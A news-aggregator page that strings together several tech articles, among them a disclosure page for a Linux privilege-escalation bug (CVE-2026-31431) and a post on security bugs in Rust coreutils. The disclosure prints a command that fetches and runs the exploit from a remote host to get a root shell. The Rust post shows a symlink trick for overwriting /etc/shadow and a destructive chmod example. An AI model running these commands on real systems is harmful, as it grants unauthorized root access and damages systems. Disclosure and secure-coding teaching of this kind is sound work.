10 interesting stories served every morning and every evening.
10 interesting stories served every morning and every evening.
April 29th, 2026
To create a fundamentally better editor, we had to invent a new approach to building desktop software. Our previous editor, Atom, was built as a fork of Chromium, spawning the Electron framework in the process. Electron eventually became the foundation of VS Code (which today seems to be forked into a new AI code editor every other week). Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn’t make Atom better than the platform it was built on.
So we started over. Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU. That meant writing our own UI framework, GPUI, from scratch in Rust.
Owning every layer of our stack lets us take Zed places that no one building on borrowed foundations can go, but we knew from the beginning that it wasn’t going to be an easy path. Thanks to years of hard work by our team and community, Zed is closer than ever to that ideal tool we set out to create. We’ve added a ton of capabilities while remaining true to our core ethos of craft and performance, and hundreds of thousands of developers now rely on Zed to ship software each day. That’s part of what gives us the confidence to declare version 1.0.
What 1.0 Means
Developers expect a modern editor to support dozens of languages and their ecosystems, endless variations and edge cases across every stack: Git integration, SSH remoting, a Debugger, and, yes, rainbow brackets. We’ve spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.
Zed is also an AI-native editor. You can run multiple agents in parallel, and edit predictions suggest your next change at keystroke granularity and with the speed you’ve come to expect from Zed. The Agent Client Protocol opens Zed up to a growing number of the best agents out there, including Claude Agent, Codex, OpenCode, and more recently Cursor. We built AI into our editor’s foundation instead of bolting it on top.
We’re also launching Zed for Business. Companies have been asking us for a way to roll out Zed to their engineering teams, and very soon they can, with centralized billing, role-based access controls, and team management.
1.0 doesn’t mean “done”. It also doesn’t mean “perfect”. It means we’ve reached a tipping point where most developers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced because something was missing, 1.0 is our invitation to try again. Zed is more capable than it’s ever been, and still more performant.
Where We’re Going
Our vision hasn’t changed since we started: we’re building the most performant and collaborative coding environment. What’s changed is what collaboration means while creating software. It used to mean humans working together in real time. Now it means humans and AI agents, working in the same space, on the same code.
Building our own foundations is what got us to 1.0, and it’s also what makes the next chapter possible. We’re actively developing DeltaDB, a synchronization engine built on CRDTs that tracks every change with character-level granularity. DeltaDB lets multiple humans and agents share a single, consistent view of the codebase as it evolves. DeltaDB will allow you to invite teammates into conversations with agents to review and evolve agentic code directly in the context from which it’s generated.
This vision depends on deep ownership of our fundamental primitives. It’s not an experience we’d be able to ship inside of someone else’s browser engine.
A Milestone, Not a Finish Line
We’ve shipped over a thousand versions of Zed, but all of them began with zero. Today, that changes.
We’ll keep shipping every week, the way we always have. The list of things to build will never end, and that’s exactly how we like it. Each release moves the craft forward.
If you want to try Zed, download now. If you want to help us build it, join us!
Related Posts
Check out similar blogs from the Zed team.
Looking for a better editor?
You can try Zed today on macOS, Windows, or Linux. Download now!
We are hiring!
If you’re passionate about the topics we cover on our blog, please consider joining our team to help us ship the future of software development.
Summary
When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to “extra usage” billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).
Environment
Claude Code v2.1.119
macOS (Apple Silicon)
Max 20x plan ($200/month)
Model: claude-opus-4 – 6[1m] (also reproduces with claude-opus-4 – 7)
Reproduction
Minimal reproduction — no project files needed:
# This FAILS with “out of extra usage” (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m “add HERMES.md”
claude -p “say hello” –model “claude-opus-4 – 6[1m]”
# => API Error: 400 “You’re out of extra usage…”
# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m “add hermes.md”
claude -p “say hello” –model “claude-opus-4 – 6[1m]”
# => “Hello!”
# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass
The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.
What triggers it vs. what doesn’t
Impact
$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota
Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity
The error message (“out of extra usage”) gives no indication that content-based routing is the cause, making this extremely difficult to diagnose
Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits
Expected behavior
API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.
How I found this
Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
JavaScript is not available. We’ve detected that JavaScript is disabled in this browser. Please enable JavaScript or switch to a supported browser to continue using x.com. You can see a list of supported browsers in our Help Center.
Something went wrong, but don’t fret — let’s give it another shot.
Some privacy related extensions may cause issues on x.com. Please disable them and try again.
CVE-2026 – 31431
100% reliable
every distro since 2017
container escape primitive
732 bytes
found by Xint Code
Most Linux LPEs need a race window or a kernel-specific offset.Copy Fail is a straight-line logic flaw — it needs neither.The same 732-byte Python script roots every Linux distribution shipped since 2017.
One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.
The demo
Same script, four distributions, four root shells — in one take. The same exploit binary works unmodified on every Linux distribution.
tmux — copy fail demo
live
Who is affected
If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.
Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
Distributions we directly verified:
These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.
Should you patch first?
High
Multi-tenant Linux hosts
Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel.
any user becomes root
High
Kubernetes / container clusters
The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries.
cross-container, cross-tenant
High
CI runners & build farms
GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel.
a PR becomes root on the runner
High
Cloud SaaS running user code
Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script.
tenant becomes host root
Medium
Standard Linux servers
Single-tenant production where only your team has shell access.
internal LPE; chains with web RCE or stolen creds
Lower
Single-user laptops & workstations
You’re already the only user. The bug doesn’t grant remote attackers access by itself, but any local code execution becomes root.
post-exploitation step-up
Exploit
The PoC is published so defenders can verify their own systems and validate vendor patches.
Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.
copy_fail_exp.py 732 B
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).Targets /usr/bin/su by default; pass another setuid binary as argv[1].
sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
Quick run:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026 – 31431
Mitigation
Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.
Before you can patch: disable the algif_aead module.
# echo “install algif_aead /bin/false” > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems — nothing measurable.
Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.
May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.
Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
FAQ
Loading FAQ…
Disclosure timeline
2026 – 03-23Reported to Linux kernel security team
2026 – 03-24Initial acknowledgment
2026 – 03-25Patches proposed and reviewed
2026 – 04-01Patch committed to mainline
2026 – 04-22CVE-2026 – 31431 assigned
2026 – 04-29Public disclosure (https://copy.fail/)
Xint Code
Is your software AI-era safe?
Copy Fail was surfaced by Xint Code about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.
The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.
Track record
0-day RCE
ZeroDay Cloud
Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.
Top 3
DARPA AIxCC
Finalist in the AI Cyber Challenge hosted by DoD DARPA.
9×
DEF CON CTF
Most-winning team in DEF CON CTF history.
In April 2026, Canonical disclosed 44 CVEs in uutils, the Rust reimplementation of GNU coreutils that ships by default since 25.10. Most of them came out of an external audit commissioned ahead of the 26.04 LTS.
I read through the list and thought there’s a lot to learn from it.
What’s notable is that all of these bugs landed in a production Rust codebase, written by people who knew what they were doing, and none of them were caught by the borrow checker, clippy lints, or cargo audit.
I’m not writing this to criticize the uutils team. Quite the contrary; I actually want to thank them for sharing the audit results in such detail so that we can all learn from them.
We also had Jon Seager, VP Engineering for Ubuntu, on our ‘Rust in Production’ podcast recently and a lot of listeners appreciated his honesty about the state of Rust at Canonical.
If you write systems code in Rust, this is the most concentrated look at where Rust’s safety ends that you’ll likely find anywhere right now.
Don’t Trust a Path Across Two Syscalls
This is the largest cluster of bugs in the audit. It’s also the reason cp, mv, and rm are still GNU in Ubuntu 26.04 LTS. :(
The pattern is always the same. You do one syscall to check something about a path, then another syscall to act on the same path. Between those two calls, an attacker with write access to a parent directory can swap the path component for a symbolic link. The kernel re-resolves the path from scratch on the second call, and the privileged action lands on the attacker’s chosen target.
Rust’s standard library makes this easy to get wrong. The ergonomic APIs you reach for first (fs::metadata, File::create, fs::remove_file, fs::set_permissions) all take a path and re-resolve it every time, rather than taking a file descriptor and operating relative to that.
That’s fine for a normal program, but if you’re writing a privileged tool that needs to be secure against local attackers, you have to be careful.
Case Study: CVE-2026 – 35355
Here’s the bug, simplified from src/uu/install/src/install.rs.
// 1. Clear the destination
fs::remove_file(to)?;
// …
// 2. Create the destination. The path is re-resolved here!
let mut dest = File::create(to)?; // follows symlinks, truncates
copy(from, &mut dest)?;
Between step 1 and step 2, anyone with write access to the parent directory can plant to as a symlink to, say, /etc/shadow. Then File::create follows the symlink and the privileged process happily overwrites /etc/shadow with whatever from happened to contain.
The fix uses OpenOptions::create_new(true):
fs::remove_file(to)?;
let mut dest = OpenOptions::new()
.write(true)
.create_new(true)
.open(to)?;
copy(from, &mut dest)?;
The docs for create_new say (emphasis mine):
No file is allowed to exist at the target location, also no (dangling) symlink. In this way, if the call succeeds, the file returned is guaranteed to be new.
No file is allowed to exist at the target location, also no (dangling) symlink. In this way, if the call succeeds, the file returned is guaranteed to be new.
Rule: Anchor on a File Descriptor Instead
A &Path in Rust looks like a value, but remember that to the kernel it’s just a name. That name can point to different things from one syscall to the next.
Anchor your operations on a file descriptor instead.
create_new() only helps with that when you’re creating a new file. For everything else, open the parent directory once and work relative to that handle.
If you act on the same path twice, assume it’s a TOCTOU (Time Of Check To Time Of Use) bug until you’ve proven otherwise.
Set Permissions at Creation Time, Not After
This is a close relative of TOCTOU. You want a directory with restrictive permissions, so you write something like this.
// Create with default permissions
fs::create_dir(&path)?;
// Fix up permissions
fs::set_permissions(&path, Permissions::from_mode(0o700))?;
For a brief moment, path exists with the default permissions. Any other user on the system can open() it during that window. Once they have a file descriptor, the later chmod doesn’t take it away from them.
Rule: Set Permissions at Creation, Never After
Reach for OpenOptions::mode() and DirBuilderExt::mode() so the file or directory is born with the permissions you want. The kernel will apply your umask on top, so set that explicitly too if you really care.
String Equality on Paths Is Not the Same as Filesystem Identity
The original –preserve-root check in chmod was literally this:
if recursive && preserve_root && file == Path::new(“/”) {
return Err(PreserveRoot);
}
That comparison is bypassed by anything that resolves to / but isn’t spelled /. So /../, /./, /usr/.., or a symlink that points to /. Run chmod -R 000 /../ and see it rip right past your check and lock down the whole system.
Here’s the fix:
fn is_root(file: &Path) -> bool {
matches!(fs::canonicalize(file), Ok(p) if p == Path::new(“/”))
}
if recursive && preserve_root && is_root(file) {
return Err(PreserveRoot);
}
Rule: Resolve Paths Before Comparing Them
canonicalize resolves .., ., and symlinks into a real absolute path. That’s a lot better than string comparison.
Oh and if you were wondering about this line:
matches!(fs::canonicalize(file), Ok(p) if p == Path::new(“/”))
I think that’s just a fancy way of saying
// First, resolve the path to its canonical form
if let Ok(p) = fs::canonicalize(file) {
// If that succeeded, check if the canonical path is “/”
p == Path::new(“/”)
} else {
false
}
In the specific case of –preserve-root, this works because / has no parent directory, so there’s nothing for an attacker to swap from underneath you. In the more general case of comparing two arbitrary paths for filesystem identity, however, you’d want to open both and compare their (dev, inode) pairs, the way GNU coreutils does. (Think identity, not string equality.)
By the way, my favorite bug in this group is CVE-2026 – 35363:
rm . # ❌
rm .. # ❌
rm ./ # ✅
rm ./// # ✅
It refused . and .. but happily accepted ./ and .///, then deleted the current directory while printing Invalid input. 😅
Stay in Bytes at Unix Boundaries
Rust’s String and &str are always UTF-8.
That’s a great choice in 99% of all cases, but Unix paths, environment variables, arguments, and the inputs flowing through tools like cut, comm, and tr live in the messy world of bytes.
Every time a Rust program bridges that gap, it has three options.
Lossy conversion with from_utf8_lossy silently rewrites invalid bytes to U+FFFD. That’s just fancy data corruption.
🫤 Strict conversion with unwrap or ? crashes or refuses to operate.
😚 Staying in bytes with OsStr or &[u8] is what you should usually do.
The audit found bugs in both of the first two categories. Here’s an example.
Case Study: comm (CVE-2026 – 35346)
This is the original code, from src/uu/comm/src/comm.rs.
// ra, rb are &[u8], raw bytes from the input files.
print!(“{}”, String::from_utf8_lossy(ra));
print!(“{delim}{}”, String::from_utf8_lossy(rb));
GNU comm works on binary files because it just shuffles bytes around. The uutils version replaced anything that wasn’t valid UTF-8 with U+FFFD, which silently corrupted the output.
Here’s the fix: stay in bytes.
let mut out = BufWriter::new(io::stdout().lock());
out.write_all(ra)?;
out.write_all(delim)?;
out.write_all(rb)?;
print! forces a UTF-8 round-trip through Display. Write::write_all does not.
It writes the raw bytes directly to stdout.
Rule: Pick the Right Type for the Situation
For Unix-flavored systems code, use Path and PathBuf for filesystem paths, OsString for environment variables, and Vec<u8> or &[u8] for stream contents. It’s tempting to round-trip them through String for easier formatting, but that’s where the corruption creeps in.
UTF-8 is a great default for application strings, but it’s absolutely, positively the wrong default for the raw byte stuff Unix tools work with.
The code.overheid.nl (Dutch) platform is now live. It is the government-wide code platform for publishing and developing open-source software. The platform is fully self-hosted and supports digital sovereignty.
For now, this is a pilot using Forgejo, an open-source, European, and sovereign alternative to GitHub and GitLab. Not all government organisations can use the platform yet. Developers are invited to contribute, with the aim of eventually growing it into a shared Git platform for government bodies.
Get involved
The code platform is initiated by the Open Source Program Office at the Ministry of the Interior and Kingdom Relations (BZK), in collaboration with DAWO (SSC-ICT), Opensourcewerken (Dutch), and developer.overheid.nl. Interested in joining? Please email codeplatform@rijksoverheid.nl.
Further information is available in Dutch, in the blog ‘We gaan samen code.overheid.nl bouwen’ (‘We’re building code.overheid.nl together’) on developer.overheid.nl.
git is decentralized, but what of the rest?
GitHub seems to be crumbling the past couple of weeks.
Whatever the reason, ultimately its not great for 90% of the
world’s OSS to depend on one provider. Centralized systems
always crumble; it’s the emails, gits, and IRCs that stand
the test of time. Tangled aims to fit in this space, allow
me to explain.
Code collaboration has always made use of two protocols, one
for code transfer and one for communication:
It began with the email flow: git (code transfer) + email
(comms)
Then there was GitHub: git (code transfer) + GitHub the
website (comms)
There is the ForgeFed project: git (code transfer) +
maybe
ActivityPub
(comms)
We are building Tangled: git (code transfer) + AT
protocol (comms)
Tangled federates events among git servers (called “knots”).
You can collaborate on repositories on any server and you
can fork across servers. You can even push to a repository
on your own server, and open a pull-request on a repo hosted
on a completely different server. In a lot of ways, this is
quite like hosting your own cgit instance, and sending out
patches via email.
Tangled uses AT to facilitate the Authenticated Transfer of
events surrounding code: like issues and pull-requests, and
it also enables a few social bits: a timeline of events,
follows, stars (and vouches very soon). AT is used to share
collaborator invites and ssh pubkeys, but the rest is just
good ol’ git.
OSS needs to break free from monocultures like GitHub, but
code collaboration should still be fun and social.
Coding agents have mostly lived on your laptop. Today we’re moving them to the cloud, where they run on their own, in parallel, and notify you when they’re done. You can start them from the Mistral Vibe CLI or directly in Le Chat, offloading a coding task without leaving the conversation.
Powering this is Mistral Medium 3.5 in public preview, our new default model in Mistral Vibe and Le Chat, built to run for long stretches on coding and productivity work. The new Work mode in Le Chat (Preview) extends this with a powerful agent for complex, multi-step tasks like research, analysis, and cross-tool actions.
Highlights.
Mistral Medium 3.5, a new flagship model that merges instruction-following, reasoning, and coding into a single 128B dense model. Released as open weights, under a modified MIT license.
Strong real-world performance at a size that runs self-hosted on as few as four GPUs.
Mistral Vibe remote agents for async coding: sessions run in the cloud, can be spawned from the CLI or Le Chat, and a local CLI session can be teleported up to the cloud.
Start Mistral Vibe coding tasks in Le Chat. Sessions run on the same remote runtime and keep going while you step away.
Work mode in Le Chat runs on a new agent, powered by Mistral Medium 3.5, that works through multi-step tasks, calling tools in parallel until the job is done.
Mistral Medium 3.5.
Mistral Medium 3.5 is our first flagship merged model, available in public preview. It is a dense 128B model with a 256k context window, handling instruction-following, reasoning, and coding in a single set of weights. It performs strongly in real-world use, with self-hosting possible on as few as four GPUs. Reasoning effort is now configurable per request, so the same model can answer a quick chat reply or work through a complex agentic run. We trained the vision encoder from scratch to handle variable image sizes and aspect ratios.
Mistral Medium 3.5 scores 77.6% on SWE-Bench Verified, ahead of Devstral 2 and models like Qwen3.5 397B A17B. It also has strong agentic capabilities and scores 91.4 on τ³-Telecom.
The model was built for long-horizon tasks, calling multiple tools reliably, and producing structured output that downstream code can consume. It is the model that made async cloud agents in Vibe practical to ship.
Mistral Medium 3.5 becomes the default model in Le Chat. It also replaces Devstral 2 in our coding agent, Vibe CLI.
Vibe remote agents.
From today, coding sessions can work through long tasks while you’re away. Many can run in parallel, and you stop being the bottleneck on every step the agent takes.
You can start the cloud agents from the Mistral Vibe CLI or from Le Chat. While they run, you can inspect what the agent is doing, with file diffs, tool calls, progress states, and questions surfaced as you go. Ongoing local CLI sessions can be teleported up to the cloud when you want to leave them running, with session history, task state, and approvals carrying across.
Vibe sits between the systems engineering teams already use, with humans in the loop wherever they’re needed. It plugs into GitHub for code and pull requests, Linear and Jira for issues, Sentry for incidents, and apps like Slack or Teams for reporting.
Each coding session runs in an isolated sandbox, including broad edits and installs. When the work is done, the agent can open a pull request on GitHub and notify you, so you review the result instead of every keystroke that produced it.
It fits the high-volume, well-defined work that takes a developer’s time without taking their judgment: module refactors, test generation, dependency upgrades, CI investigations, as well as bug fixes.
We use Workflows orchestrated in Mistral Studio to bring Mistral Vibe into Le Chat. We originally built this for our own in-house coding environment, then for our enterprise customers. Today the capability opens up to everyone, who can now launch coding tasks from the web. And without being tied to a local terminal, a developer can run several in parallel.
You can start coding sessions directly in Le Chat, so a task described in chat runs on the same remote runtime as the CLI and the web, and comes back later as a finished branch or a draft PR.
New Work mode in Le Chat (Preview).
Work mode is a powerful new agentic mode for complex tasks in Le Chat, powered by a new harness and Mistral Medium 3.5. The agent becomes the execution backend for the assistant itself, so Le Chat can read and write, use several tools at once, and work through multi-step projects until it completes what you’ve asked.
Here’s what Work mode enables you to do today.
Cross-tool workflows: catch up across email, messages, and calendar in a single run; prepare for a meeting with attendee context, latest news, and talking points pulled from your sources.
Research and synthesis: dive into a topic across the web, internal docs, and connected tools, then produce a structured brief or report you can edit before exporting or sending.
Triage your inbox and draft replies; create issues in Jira from your team and customer discussions; send a summary to your team on Slack.
Sessions persist longer than a typical chat reply, so an agent can keep going across many turns, through trial-and-error, and through to completion. In Work mode, connectors are on by default rather than chosen manually, which lets the agent reach into documents, mailboxes, calendars, and other systems for the rich context it needs to take correct action.
Every action the agent takes is visible: you see each tool call and the thinking rationale. Le Chat will ask for explicit approval—based on your permissions—before proceeding with sensitive tasks like sending a message, writing a document, or modifying data.
Get started.
Mistral Medium 3.5 is available today in Mistral Vibe and Le Chat, and powers remote coding agents and Work mode in Le Chat on the Pro, Team, and Enterprise plans.
Through API, it’s priced at $1.5 per million input tokens and $7.5 per million output tokens. Open weights are on Hugging Face under a modified MIT license.
It is also available for prototyping, hosted on NVIDIA GPU-accelerated endpoints on build.nvidia.com and as a scalable containerized inference microservice, NVIDIA NIM.
Build the future of agentic systems with us.
We’re hiring across research, engineering, and product to push agentic systems further. See our open roles.
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.